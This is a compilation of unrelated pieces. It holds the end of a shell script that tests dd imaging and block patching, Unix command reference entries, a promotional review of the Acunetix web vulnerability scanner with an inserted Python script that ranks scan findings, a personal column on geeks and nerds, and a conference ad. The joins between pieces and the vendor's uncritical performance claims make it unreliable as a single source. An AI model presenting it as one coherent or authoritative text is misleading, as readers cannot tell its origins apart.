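image_plain() {
  make_device
  dd if="$WORK/dev.img" of="$WORK/plain.img" bs=512 2>/dev/null
  size_of "$WORK/plain.img"
}

# conv=noerror,sync: the short final block is padded with NUL bytes up to
# bs, so the image is a whole number of blocks (2 x 512 = 1024). This is why
# a sync'd image never hashes the same as its source; verify against the
# first 1000 bytes, or image without sync, before calling it a match.
image_sync() {
  make_device
  dd if="$WORK/dev.img" of="$WORK/sync.img" bs=512 conv=noerror,sync 2>/dev/null
  size_of "$WORK/sync.img"
}

# Byte-for-byte verification of the plain image against the source.
image_verified() {
  image_plain >/dev/null
  if cmp -s "$WORK/dev.img" "$WORK/plain.img"; then echo yes; else echo no; fi
}

# Write one 512-byte block of 'B' at output block 1 of a 4-block (2048 byte)
# file. $1 is "notrunc" or empty. Without notrunc, dd truncates the output
# file at the seek offset before writing, so blocks 2 and 3 are lost and the
# file shrinks to 1024 bytes; with conv=notrunc all four blocks survive and
# only block 1 changes. Prints the resulting file size.
patch_block() {
  dd if=/dev/zero bs=512 count=4 2>/dev/null | tr '\000' 'A' > "$WORK/target.img"
  dd if=/dev/zero bs=512 count=1 2>/dev/null | tr '\000' 'B' > "$WORK/block.img"
  if [ "$1" = notrunc ]; then
    dd if="$WORK/block.img" of="$WORK/target.img" bs=512 seek=1 conv=notrunc 2>/dev/null
  else
    dd if="$WORK/block.img" of="$WORK/target.img" bs=512 seek=1 2>/dev/null
  fi
  size_of "$WORK/target.img"
}

# Did the write land? Block 1 of the patched file must contain only 'B'.
patched_block_all_b() {
  rest=$(dd if="$WORK/target.img" bs=512 skip=1 count=1 2>/dev/null | tr -d 'B' | wc -c | tr -d ' ')
  if [ "$rest" = 0 ]; then echo yes; else echo no; fi
}

cleanup() { rm -rf "$WORK"; }
```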
“which”

Syntax

which [options] [--] program name [...]

Options

--all, -a
Print all matching executables in PATH, not just the first.

--read-alias, -i
Read aliases from stdin, reporting matching ones on stdout. This is useful in combination with using an alias for which itself (e.g. “alias which=’alias | which -i’”).

--skip-alias
Ignore option --read-alias, if any. This is useful to explicitly search for normal binaries, while using the “--read-alias” option in an alias for which.

--skip-dot
Skip directories in PATH that start with a dot.

--skip-tilde
Skip directories in PATH that start with a tilde and executables which reside in the HOME directory.

--show-dot
If a directory in PATH starts with a dot and a matching executable was found for that path, then print “./program_name” rather than the full path.

--show-tilde
Output a tilde when a directory matches the HOME directory. This option is ignored when which is invoked as root.

--tty-only
Stop processing options on the right if not on tty.

--version, -v, -V
Print version information on standard output then exit successfully.

--help
Print usage information on standard output then exit successfully.

RETURN VALUE
Which returns the number of failed arguments, or -1 when no program name was supplied.

EXAMPLE
A useful way to use this command is by adding an alias for which like the following:

alias which=’which --tty-only --show-tilde --show-dot’

This will print the readable ~/ and ./ when starting which from your prompt, while still printing the full path when used from a script:

> which ssh
~/bin/ssh
> echo `which ssh`
/home/hacker/bin/ssh

Aliases are also supported. An example alias for which that is using this feature is as follows:

alias which=’alias | which --tty-only --read-alias --show-tilde --show-dot’

This will print the output of alias for each alias that matches one of the given arguments. For example, using this alias on itself in a tcsh:

$ alias which alias \| /usr/bin/which -i !\*
$ which which
which (alias | ./which -i !*)
/usr/bin/which

“uname”

The “uname” command will output system information about the host and operating system it is run from. When no options are supplied, ‘uname’ acts as if the ‘-s’ flag was given.

Syntax

uname [options]...

Options

-a, --all
Display all of the information from the flags listed below.

-m, --machine
Display the host (hardware) type.

-n, --nodename
Display the host’s network node hostname.

-p, --processor
Display the host’s processor type.

-r, --release
Display the operating system release.

-s, --sysname
Display the operating system name.

-v, --version
Print the operating system version.

If multiple options or ‘-a’ are supplied, the selected information is printed in this order:

Sysname Nodename Release Osversion Machine

The OSVERSION may consist of multiple words. For instance:

$ uname -a
=> Linux linux-0915 2.6.25.16-0.1l-pae #1 SMP 2008-08-21 00:34:25 +0200 i686 i686 i386 GNU/Linux


Command Summary 
The following are a list of *NIX commands and a quick summary of their use.


A 


alias: Create an alias 


apropos: Search Help manual pages (man -k) 


at: Execute scheduled command at a time 


awk: Find and Replace text 
B 


bash: GNU Bourne-Again Shell 
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bg: Send to background 


break: Exit from a loop 


C 


case: Conditionally perform a command 

cat: Display the contents of a file 

cd: Change the Directory 

cfdisk: Partition table manipulator for Linux 

chgrp: Change group ownership 

chmod: Change access permissions 

chown: Change file owner and group 

chroot: Run a command with a different root directory 
chkconfig: System services (runlevel) 

cksum: Print CRC checksum and byte counts

clear: Clear the terminal screen 

cmp: Compare two files 

comm: Compare two sorted files line by line 

command: Run a command - ignoring shell functions 
continue: Resume the next iteration of a loop 

cp: Copy one or more files to another location 

cron: Daemon to execute scheduled commands 

crontab: Schedule a command to run at a later time 
csplit: Split a file into context-determined sections 


cut: Divide a file into several parts 


D 


date: Display or change the date & time 

dd: Convert and copy a file, write disk headers, boot records 
declare: Declare variables and give them attributes 

df: Display free disk space 

diff: Display the differences between two files 

dig: DNS Lookup

dmesg: Print kernel & driver messages 


du: Estimate file space usage


E


echo: Display message on screen

egrep: Search file(s) for lines that match an extended 
(regex) expression 

eject: Eject removable media 

emacs: A text editor

enable: Enable and disable built-in shell commands 

env: Set or view environment variables 

ethtool: Ethernet card settings 

eval: Evaluate several commands/arguments 

exec: Execute a command 

exit: Exit a shell 

expect: Automate arbitrary applications accessed over a terminal
expand: Convert tabs to spaces

export: Set an environment variable

expr: Evaluate expressions


F


fg: Send job to foreground

fgrep: Search file(s) for lines that match a fixed string

file: Determine the file’s type (i.e., pdf, text, etc.)

find: Search for files that meet a desired criteria

for: Expand words, and execute commands - used for looping in shells

format: Format disks or tapes

free: Display memory usage

ftp: File Transfer Protocol


G


gawk: Find and Replace text within a file/files

grep: Search file(s) for lines that match a given pattern

groups: Print group names a user is in

gzip: Compress or decompress named file/files


H


head: Output the first part of file(s)

history: Print the command history

hostname: Print or set the host’s system name


I


id: Print user and group ids

if: Conditionally perform a command

ifconfig: Configure a network interface

ifdown: Stop a network interface

ifup: Start a network interface up

import: Capture an X server screen and save the image to file


K


kill: Stop or end a running process

killall: Kill processes by name


L


less: Display output one screen at a time

let: Perform arithmetic on shell variables

ln: Make links between files

local: Create variables

locate: Find files

logname: Print the user’s current login name

logout: Exit a login shell

lpr: Print a file

lprm: Remove jobs from the print queue

ls: List information about file/files

lsof: List open files


M


make: Re/Compile a program

man: The *NIX help manual

mkdir: Create new folder/folders

mkfifo: Make FIFOs (named pipes)

mknod: Make block or character special files

more: Display output one screen at a time

mount: Mount a file system

mv: Move or rename files or directories


N


netstat: Display network information

nice: Set the priority of a command or job

nslookup: Query DNS servers interactively


O


open: Open a file in its default application


P


passwd: Modify a user’s password

ping: Test a network connection

popd: Restore the previous value of the current directory

ps: Process status

pushd: Save and then change the current directory


Q


quota: Display disk usage and limits

quotacheck: Scan a file system for disk usage

quotactl: Set disk quotas


R


ram: Create and manage a RAM based disk device

rcp: Copy files between two machines

read: Read a line from standard input

reboot: Reboot the system

renice: Alter priority of running processes

remsync: Synchronize remote files via email

return: Exit a shell function

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rev: Reverse lines of a file 
rm: Remove files 
rmdir: Remove folder/folders 


rsync: Remote file copy (Synchronize file trees) 


S


screen: Multiplex terminal, run remote shells via ssh 
scp: Secure copy (remote file copy) 

sdiff: Merge two files interactively 

sed: The stream Editor 

select: Accept keyboard input 

seq: Print numeric sequences 

set: Manipulate shell variables and functions 

sftp: Secure File Transfer Program 

shift: Shift positional parameters 

shopt: Shell Options 

shutdown: Shutdown or restart linux 

sleep: Delay for a specified time 
slocate: Find files 

sort: Sort text files 

source: Run commands from a file (‘.’)

split: Split a file into fixed-size sections 

ssh: Secure Shell client (an encrypted remote login program) 
strace: Trace system calls and signals 

su: Substitute user identity 

sudo: Execute a command as another user 


sum: Print a checksum for a file 


T 


tail: Output the last part of files 

tar: Tape Archiver 

tee: Redirect output to multiple files 

time: Measure a program’s running time 

touch: Change file timestamps 

top: List the processes running on the system 
traceroute: Trace the Route to a Host over a network 
trap: Run a command when a signal is set (bourne) 
tty: Print filename of terminal on stdin 


type: Describe a command 


U 


ulimit: Limit user resources 

umask: Change a user’s file creation mask 
umount: Unmount a device 

unalias: Remove an alias 

uname: Print system information 


unexpand: Convert spaces to tabs 





unset: Remove variable or function names 
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unshar: Unpack shell archive scripts 

until: Execute commands (until error) 

useradd: Create a new user account 

usermod: Modify a user account 

users: List the currently logged in users on a system 


uuencode: Encode a binary file 





uudecode: Decode a file created by uuencode 


V 


vi: Text Editor 


vmstat: Report virtual memory statistics 


W 


watch: Execute or display a program periodically (that is 
every so often) 

wc: Print byte, word, and line counts

whereis: Report all known instances of a command 

which: Locate a program file in the user’s path. 

while: Execute commands when a statement is true 

who: Print all of the usernames currently logged into 
a host 

whoami: Print the current user id and name (‘id -un’)

wget: Retrieve web pages or files via HTTP, HTTPS or FTP 


write: Send a message to another user on a host 


CRAIG S. WRIGHT 


Acunetix Web Vulnerability Scanner




In today’s threat landscape, organizations and security professionals can no longer focus on the patching and infrastructure vulnerabilities. If regulations or industry standards are not your driver, you can guarantee that clients will soon be asking “how are you securing your applications?” As with any solution you need to have the people, processes, and technology in place to be successful. While much of this testing could be done manually, the proliferation of applications used in organizations today would make manual testing an insurmountable and never-ending task. Application Security testing tools are often the best solution for security professionals tasked with securing applications throughout the Software Development Lifecycle (SDLC). This is where we introduce Acunetix! As a precursor to the remainder of this article, I have had the opportunity to work with a number of Application Security tools for large enterprises. This is the first time I have worked directly with Acunetix.


What is Acunetix Web Vulnerability Scanner 
In Acunetix’s own words:

“Acunetix Web Vulnerability Scanner is an automated web application security testing tool that audits your web applications by checking for vulnerabilities like SQL Injection, Cross site scripting, and other exploitable vulnerabilities.”


The need to be able to test applications in depth and further than traditional vulnerability management tools (e.g. Nessus, Nexpose, etc.) do has created a market with several players in the Application Security space. Whereas Nessus / Nexpose are vulnerability management (VM) tools, Acunetix focuses more on web application vulnerabilities and variants thereof, and does a much better job at detection than traditional VM tools.


Key Features and Functionality 

I could spend time walking you through how to complete a scan with Acunetix, but the “getting started” and “user manual” provide a wealth of information for this. The best use of your time will be to understand the features that distinguish Acunetix from the other vulnerability scanners.


• Vulnerability Detection — First and foremost, does Acunetix do what it says it does? The resounding answer is...YES! The ability to scan HTML5/JS sites provides coverage where a number of products start to fall apart. Additionally, the speed of the scanner allows scans to be completed in very little time. When I did a side by side comparison I found a number of features with Acunetix I did not see with OSS (Open Source Software) products;

11/2014
Acunetix Web Vulnerability Scanner

• AcuSensor — AcuSensor is an agent installation that is installed on the web server for testing purposes, interacting with the console. This allows the number of false positives to be reduced as the scanner is not only relying on HTTP responses but will also interact with the agent on the server to determine if the test was successful or not. At the time of this writing, AcuSensor is used primarily with PHP and .NET web applications. I understand that other products have this similar technology for JAVA so before investing make sure you understand how your applications were written so you can fully take advantage of this. To emphasise, AcuSensor identifies more vulnerabilities than a traditional black box web security scanner and reduces false positives. AcuSensor will show you the line of code where it found the vulnerability, which helps you to get it fixed faster. This is achieved by combining black box scanning techniques with dynamic code analysis whilst the source code is being executed.

• It is also possible to detect some vulnerabilities using an intermediary server. AcuMonitor allows Acunetix WVS to find such vulnerabilities, including Blind XSS, Server Side Request Forgery and Email Header Injection. It depends on the vulnerability but it can be reported during the scan and also by an email which will be sent directly to the user.

• Tools — These are a few of the features that jumped out at me right away. Some of the tools are not something you’d expect to see in a Web Application Security scanner, but such tools aid interpretation of the scan results.


Figure 1. The Tools pane of Acunetix WVS: Site Crawler, Target Finder, Subdomain Scanner, Blind SQL Injector, HTTP Editor, HTTP Sniffer, HTTP Fuzzer, Authentication Tester, Compare Results.
• Target Finder — This functionality lets you scan subnets looking for web services by port (e.g. 80, 443, etc.). This functionality is important especially in organizations where there is uncertainty where web services are actually running and where some malware might have installed web servers on users’ machines. This is something that is missing in some of the other products out there today.

• Subdomain scanner — this is another feature that I did not expect to find in a web security scanner. The ability to search for subdomains based on DNS records automatically is another valuable tool for someone trying to get a handle on their environment.

• Compare Results — Conducting repeat scans to confirm that issues have been remediated has been problematic in other tools. This feature made the issues between each test easy to distinguish.

• The Scheduler — Acunetix allows you to schedule your scans for a single site or multiple sites. This is a great feature in a vulnerability scanner as it allows you to test during those late night maintenance windows without giving up those precious hours of sleep or drinking!

• Single Pane Navigation — While this is more of a preference, there were many instances where I have spent time reviewing issues with application teams having to flip through multiple screens. The Acunetix issue Summary is managed in one pane with all the relevant information provided such as issue details, issue Summaries, and recommended fixes. The tools mentioned above are all in the same frame as well.


Other Useful Functionalities 

It is impossible to detail all the functionalities of the scanner in one article but these last few certainly deserve a mention.

One of these is the ability of Acunetix to crawl and scan HTML5/JS sites including Angular JS, which is already ahead of the pack in version 9.5 and I’m told will be further strengthened in version 10. This is one feature which readers should find very useful.

Another plus is that the information is easy to understand, the vulnerabilities are categorized allowing the user to focus on the most important alerts, and the results include information on the vulnerability, remediation advice and are augmented with external references. In addition, whilst working on the review, the Bash vulnerability was discovered, and within 24 hours Acunetix notified of an update for a check for Shellshock.
Positives

Easy to use — Acunetix is extremely easy to use right after being installed. Additionally, it allowed me to configure the scan with some more in depth testing options to ensure I covered most of the application without sacrificing speed. All key features and functionality are contained within the application (i.e. issue retest, scan templates, CVE info, Web Services scanning, etc.) and easily found so that the documentation provided is rarely needed. The additional tools (Target finder, subdomain scanners, port scanner, etc.) for discovery of your environment are a great addition to the product.

Application Authentication — Authenticating your application is important, as you want to make sure you cover your entire application as part of the test. This has always been challenging in other products (even with a completely separate application to manage authentication). Acunetix did a good job of handling the application authentication through various applications without much hassle.

Pricing — I have worked with other solutions before and pricing always seemed to be complex and tiered. The Acunetix pricing model is very straightforward and very reasonably priced (https://www.acunetix.com/ordering/).

Product Transparency — Any time I evaluate any product I open my favourite search engine and type in '$productname bugs' or '$productname request for enhancements' to find some forums on problems that current users are having. I was surprised to see that Acunetix will make all this information available to all people including non-customers: http://acunetixwvs.ideascale.com/a/ideafactory.do. This is of some reassurance that you're not falling into that slippery salesman approach and that you know what you are buying. Check out this page!

The comparative analyses of similarly priced competitor scanners show that Acunetix scans for and detects 2-3 times the number of vulnerabilities with lower false positives and higher confidence. So you will scan up to 2 times faster, and you are nonetheless at par or better than the ones that are more highly priced. This is because of the Acunetix DeepScan crawling and scanning technology and also because the lab has a much larger collection of scripted or choreographed hacking simulations and a wider variety of variants that they generate in their War Games Lab than most other similarly priced scanners. They also provide you with a fully documented SDK for scanning script customization.


Results 


Acunetix focuses on being a good scanner giving 
good technical results and a palette of reports. A 
scan is usually run on a single target. 
Acunetix Web Vulnerability Scanner








On the Net 


• 14-day Acunetix WVS Download — http://www.acunetix.com/vulnerability-scanner/download/

• 14-day Acunetix OVS Registration — http://www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/

• Acunetix Website — http://www.acunetix.com

• Online Scan with Acunetix — https://www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/

• Audit Your Website Security with Acunetix Web Vulnerability Scanner — https://www.acunetix.com/vulnerability-scanner/

• Advanced Pen-Testing Tools — https://www.acunetix.com/vulnerability-scanner/pen-testing-tools/

• Regulatory Compliance Reports for PCI, HIPAA and others — https://www.acunetix.com/vulnerability-scanner/pci-regulatory-compliance/

• AcuMonitor Service — http://www.acunetix.com/websitesecurity/acumonitor/











About Acunetix 

Securing the web applications of today's businesses is perhaps the most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications — which often have a direct line into the company's most valuable data assets — are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.

Acunetix was founded with this threat in mind. It was understood that the only way to combat website hacking was to develop an automated tool that could help companies scan their web applications to identify and resolve exploitable vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released — a heuristic tool designed to replicate a hacker's methodology to find dangerous vulnerabilities — like SQL injection and cross site scripting — before hackers do. Acunetix WVS brings an extensive feature-set of both automated and manual penetration testing tools, enabling security analysts to perform a complete vulnerability assessment, and repair detected threats, with just the one product.

The Acunetix development team consists of highly experienced security developers, all with extensive development experience in network security scanning software prior to working on Acunetix WVS. The management team is backed by years of experience in marketing and selling security software.

From www.acunetix.com











• Acunetix provides CVE, CVSS, CWE scores either in the results or in the reports, as well as OWASP, SANS reports. Results can be compared using Acunetix result comparison. Of course risk would need to be further assessed on the basis of the target app importance. If Acunetix is repeatedly used on multiple targets then data aggregation solutions need to be made available.

• Acunetix results can be consumed by a vulnerability data management system to address more management requirements. These solutions would use Acunetix XML outputs to integrate with Vulnerability Management aggregation tools such as one particular Technology Partner Acunetix works with, whereby the vulnerability information resulting from multiple orchestrated scans and/or scanners would be overlaid onto a matrix of applications classified by importance to help prioritize remediation tasks. That system comes complete with defect tracking and management system integration which then lines up tasks for developers in an SDLC environment to look into. Acunetix can point to and support integration with such solutions that could be deployed to achieve these goals at a fee if not already available out of the box as with particular Technology Partners.
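The two bullets above describe what an aggregation layer does with per-target scan output: merge several reports and rank each finding on its CVSS score against the importance of the application it was found in. The following is an added example (not Acunetix's own code, and the XML element layout is a constructed stand-in, not the real Acunetix export schema) that performs that aggregation and produces a prioritised remediation list.

```python
# Added example (not Acunetix's own code or XML schema): aggregate findings
# from several scan reports and rank them on a CVSS-by-application-importance
# matrix, as the review describes aggregation tools doing.
import xml.etree.ElementTree as ET

# Constructed sample reports in a HYPOTHETICAL element layout; Acunetix's real
# XML export uses its own schema, which this example does not reproduce.
SAMPLE_REPORTS = [
    """<scan target="https://shop.example.test">
         <alert name="SQL injection" cvss="9.8" cwe="CWE-89" url="/cart"/>
         <alert name="Missing X-Frame-Options" cvss="4.3" cwe="CWE-1021" url="/"/>
       </scan>""",
    """<scan target="https://wiki.example.test">
         <alert name="Reflected XSS" cvss="6.1" cwe="CWE-79" url="/search"/>
         <alert name="SQL injection" cvss="9.8" cwe="CWE-89" url="/page"/>
       </scan>""",
]

# Business classification of each application (constructed), used as the
# second axis of the prioritisation matrix.
APP_IMPORTANCE = {
    "https://shop.example.test": 3,  # handles payments
    "https://wiki.example.test": 1,  # internal documentation
}

def parse_report(xml_text):
    """Return a list of finding dicts from one hypothetical-format report."""
    root = ET.fromstring(xml_text)
    target = root.get("target")
    return [
        {"target": target, "name": a.get("name"), "cwe": a.get("cwe"),
         "url": a.get("url"), "cvss": float(a.get("cvss"))}
        for a in root.findall("alert")
    ]

def prioritize(reports, importance):
    """Merge all reports and sort by CVSS x importance, highest first."""
    findings = [f for r in reports for f in parse_report(r)]
    for f in findings:
        # Unknown applications get weight 1 so they are never silently dropped.
        f["score"] = round(f["cvss"] * importance.get(f["target"], 1), 1)
    return sorted(findings, key=lambda f: f["score"], reverse=True)

def top_task(reports, importance):
    """The single finding a developer should pick up first."""
    return prioritize(reports, importance)[0]

if __name__ == "__main__":
    for f in prioritize(SAMPLE_REPORTS, APP_IMPORTANCE):
        print(f"{f['score']:5.1f}  {f['target']}{f['url']}  {f['name']} ({f['cwe']})")
```

Note that the same CWE-89 finding ranks first on the payment site and only third on the wiki: the application classification, not the CVSS score alone, decides the order of work.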


Conclusion 

As I mentioned earlier, this is the first opportunity I had to try Acunetix for any length of time. It has all the features and functionality that allows the product to compete with the "big boys" in the field but is also reasonably priced. Acunetix is a solid product to get your Application Security Testing program off the ground. As always ensure that you understand your SDLC so that you get the coverage you need to test. Acunetix has also recently released an online version of the scanner for the audit of public internet facing Web Servers and Network Interfaces. You need to check yourself (so follow the link in "On the Net" frame).


MICHAEL ORTEGA 
Is There a Difference Between Geeks and Nerds?

Forget the Internet wars about vi versus Emacs or Windows versus Linux. Burr Settles has analysed the language of 2.6 million tweets to attempt to answer the contentious question "Is there a difference between Geeks and Nerds?" Let the debate begin.


Having read Burr Settles' analysis of the data, watched a number of video commentaries and consumed quite a few articles on the subject, my personal rating is very probably "Gerd", a mixture of the two. Whereas Nerd is always used as a derogatory term, Geek has a trendier, more metro connotation although personally I still strongly dislike both terms. As an unashamed, in-your-face Gerd I would like to bring some peace and unity to both camps — we share more than our critics would like to admit.

One word I have continually been described as throughout my life is "Deep". I suspect that term has been applied to both Geeks and Nerds in equal measure, so I am going to tentatively suggest that we generally have much more in common than we have differences, so rather than type Geeks and Nerds throughout this article, I will use the collective term "Gerd" from now on. Of course, individuals will rate differently on this spectrum, but I want to examine our commonalities in light of the social majority, rather than bring division — after all, society at large is rather wary of us, hence the pigeon-holing, name calling, and the tag "Being different". Fear and insecurity is a very strong motivator in the hive mind.

So let's get back to Deep. My wife has accused me of it, some of my colleagues at work have, and very few friends who know me well would tend to describe me any other way. My immediate retort to this is "Define what you mean by deep?" — which in a paradoxically, holistic way not only challenges the person making the assertion, but also answers the question. Gerds refuse to take things at face value, always scratching below the surface. Some are content with empirical evidence, some are less satisfied with classical definitions but the resounding trait is to ask questions and search for answers — and quite often questions that are taboo, impolite, or just off the scale. The point is that we have learned early on in life that most non-gerds tend to live very different lives than we do, one of the major traits being that we live in our heads. While we really do enjoy social interaction, it has got to be based on quality and interchange, rather than superficial social convention and a pretend mask of civilisation. I recently shocked a colleague at work who asked [in social niceties mode] "How are you Rob?" and got the blunt but honest [totally fed up with BS mode] "Rather p*ss*d off" reply. I did apologise, but it goes to illustrate why Gerds are classed as socially inept. I should have just smiled, said "Oh so-so" and not revealed my true feelings, but society dictates (at least on this island) that you wear your heart on your sleeve at your peril, stiff upper lip and all that. To me, that smacks of duplicity; if you don't genuinely want to know where someone is at, don't ask them. Sure, talk about the weather, the price of fish — anything — but please don't place me in a position where I have to effectively lie to you as it makes me feel very uncomfortable. On the scale of 1-10 of cardinal sins, our social interaction "sleights of hand" may be insignificant, but they are cumulative. No wonder we live in a society where the culture is so superficial, true education and wisdom shunned, and people feel disconnected and isolated. Most of the time I join my fellow conspirators and "play the game" but it does nothing but reinforce my belief that the majority of people (outside of the Gerd community) walk to the beat of a different drum.

I believe that all Gerds feel that their value systems have been betrayed at some time in their life. Maybe it was totally believing in Santa Claus and discovering you were — whilst not deliberately — effectively lied to (my first personal recollection of worldview shock) or maybe it was just being clever and different in an amorphous peer group. With large ears, thick spectacles, and a comprehensive vocabulary at school I was obvious Gerd material. The favourite insult thrown in my direction was "You swallowed a dictionary?" (My 14 year old daughter also accuses me of this, but having chatted to her about it, there is a secret pride there in her old dad, so I don't mind too much). This fracture in perception, the understanding that the world is a very different place from what we understand to be internally, is what makes Gerds, Gerds. We withdraw from the superficiality of human interaction with its movable values and eccentricities into a more clearly defined space, where the rules are more easily learned and rigorously enforced. Take computing for instance: no matter how much you yell at a computer, or how expensive your suit, or how important the deadline, or how much you love it (or lust after it for that matter) — it will not work unless you play by a strict set of immutable rules. Try applying that methodology in the workplace. People get promoted on the basis of gender, looks or connections; they are fired for speaking the truth. The power of personality rules and corporate culture then becomes an amalgam of those who most effectively play this very subtle game. In other words success regardless of talent, experience, logic or knowledge. No wonder Gerds retire to a quiet corner with a thick book or a green screen terminal and a tape drive.

Society has this pathological addiction to classifying and judging people on such superficial metrics as looks, fashion, intelligence, money, education, race, nationality or gender. Like everyone else on this planet, I am a unique individual of value. Treat me as such and do not fold, spindle or mutilate. Hence my pungent distaste at being labelled a Gerd or indeed "Deep". Please feel free to categorise me as such, provided I can categorise you as a living testimony to a grey mush of social conformity. Unless of course you are a Geek or a Nerd, in which case I will take it as a compliment from a peer.

Ironically, my employer is sending everyone on a diversity and equality training course, and I have prepared well for this. My Unix beard is long but neat and my hair is just long enough to form a decent ponytail. Maybe I should just hand this article in instead.


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early teens. A keen advocate of open systems since the mid-eighties, he has worked in many corporate sectors including finance, automotive, airlines, government and media in a variety of roles from technical support, system administrator, developer, systems integrator and IT manager. He has moved on from CP/M and nixie tubes but keeps a soldering iron handy just in case.
The BIGGEST, the BEST, the TEXAS SharePoint Conference ever!

SharePoint is at the Crossroads — Which Way Will You Go?

SPTechCon Austin, February 2015, Renaissance Austin Hotel

SharePoint in the cloud or on premises? Or both? Come to SPTechCon Austin 2015 and learn about the differences between Office 365, cloud-hosted SharePoint, on-premises SharePoint, and hybrid solutions and build your company's SharePoint Roadmap!

For developers, the future means a new app model and new app paradigms. For IT pros and SharePoint admins, it's trying to retain control over an installation that's now in the cloud. For information workers and their managers, it's about learning how to work 'social.' But it's not for everyone. Where do you need to be?

The answer is simple: SPTechCon Austin. With a collection of the top SharePoint MVPs and expert speakers, more than 80 classes and tutorials to choose from and panels focused on the changes in SharePoint, SPTechCon will teach you how to master the present and plan for the future.

80+ Classes. Microsoft Expert Speakers. Get Your Texas Sized Registration Discount — Register NOW!